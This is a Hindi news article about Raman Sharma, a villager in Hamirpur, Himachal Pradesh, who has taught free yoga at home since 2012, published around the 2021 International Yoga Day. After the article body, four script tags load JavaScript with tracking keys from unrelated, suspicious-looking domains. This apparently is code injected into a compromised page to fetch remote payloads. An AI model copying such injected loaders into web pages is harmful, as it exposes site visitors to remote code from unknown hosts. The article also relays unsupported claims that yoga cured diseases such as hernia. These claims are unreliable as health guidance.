Categories: हिमाचल

हमीरपुरः 2012 से रमन शर्मा सीखा रहे लोगों को योगा, सुबह- शाम घर पर लोगों को दे रहे योगा के टिप्स

<p>हमीरपुर जिला के बड़सर तहसील के जौड़े अम्ब पंचायत के गांव नेरी से सम्बंध रखने वाले रमन शर्मा 2012 से लोगों को योगा सिखाने में अपनी अहम भूमिका निभा रहे हैं। रमन शर्मा ने कहा कि 21 जून 2021 को 7 वां अंतराष्ट्रीय योग दिवस मनाया जा रहा है। लेकिन कोविड 19 के चलते योग दिवस पर बड़े कार्यक्रम आयोजित नहीं किये जा रहे हैं। उन्होंने बताया कि कोविड 19 से पहले विभिन्न स्कूलों में शिविर लगाकर विद्यार्थियों को योगा के टिप्स दे चुके हैं और जिससे कई लोग विभिन्न रोगों को मात देकर तंदरुस्त हुए हैं। उन्होंने कहा कि सभी लोगों को योग करना चाहिए।</p>

<p>गांव नेरी के रमन शर्मा 2012 से अपने घर पर लोगों को सुबह- शाम निःशुल्क योगा सिखाकर मिसाल पेश कर रहे हैं। कोविड 19 में भी लोग सोशल डिस्टेंसिंग अपनाकर रमन शर्मा के घर पर योगा सीखने के लिए पहुंच रहे हैं। रमन शर्मा ने बताया कि वह लोगों कपाल भाती, शीर्ष आसन, ब्रजा आसन, अर्धचंद्र आसन, करवाकर कई लोगों को विभिन्न बीमारियों से निजात दिला चुके हैं। उन्होंने कहा कि कोरोना महामारी से पहले विभिन्न स्कूलों में योग शिविर लगाकर कर विद्यार्थियों को योगा टिप्स दे चुके हैं। जिन्हें इस दौरान सम्मानित भी किया जा चुका है।</p>

<p>21 जून को पूरे विश्व में 7वां योग दिवस मनाया जा रहा है। लेकिन सार्वजनिक स्थलों पर कोई बड़ा कार्यक्रम कोरोना महामारी के चलते नहीं मनाया जा रहा है जिसका उन्हें मलाल है। उन्होंने कहा कि योग एक साधना है। जिसमें आत्मा का परमात्मा से मिलन होता है। योग करने से शरीर स्वस्थ रहता है। इसलिए सभी लोगों को योगा करना चाहिए। वहीं, योगा सीखने आई नीलम कुमारी का कहना है कि वह पिछले कई वर्षों से योग सिख रही हैं। जिससे उन्हें विभिन्न बीमारियों से निजात मिली है। योगा सीखने आये स्थानीय निवासी ने बताया कि वह भी पिछले दो तीन सालों से रमन शर्मा से योग सीख रहे हैं। उन्हें पहले हर्नियां बीमारी की शिकायत थी। लेकिन हर रोज योग सीखने से उन्हें इस बीमारी से निजात मिली है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1624255132013″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिमाचल प्रदेश मे 1.92 लाख किसान कर रहे प्राकृतिक खेती

हिमाचल प्रदेश मे 1.92 लाख किसान कर रहे प्राकृतिक खेती , प्रदेश मे 28 हजार…

13 hours ago

कांग्रेस सत्ता में आई तो पहली नौकरी की गारंटी पक्की: आनंद शर्मा

कांग्रेस सत्ता में आई तो पहली नौकरी की गारंटी पक्की: आनंद शर्मा पीएम मोदी का…

13 hours ago

मतदाताओं को मतदान का संदेश देने के लिए साइकलिंग एक्सपीडिशन स्पीति पहुंची

दुनिया के सबसे ऊंचे पोलिंग बूथ टशीगंग से साइकिल सवार देश के मतदाताओं को मतदान…

20 hours ago

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू-माफिया: CM

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू- माफिया : मुख्यमंत्री…

20 hours ago

बैजनाथ सहित अन्य विधानसभा क्षेत्र में सहायक मतदान केन्द्र होंगे स्थापित

विधानसभा क्षेत्र 20-बैजनाथ (अ.जा.) के 99-बड़ाभंगाल और 54-कसौली (अ.जा.) के 27-ढिल़्लों में सहायक मतदान केन्द्र…

20 hours ago

हिमाचल की चारों सीटों पर प्रचंड बहुमत से कमल खिलेगा: BJP

भारतीय जनता पार्टी के राष्ट्रीय अध्यक्ष जगत प्रकाश नड्डा द्वारा हिमाचल प्रदेश के नूरपुर, चंबा…

20 hours ago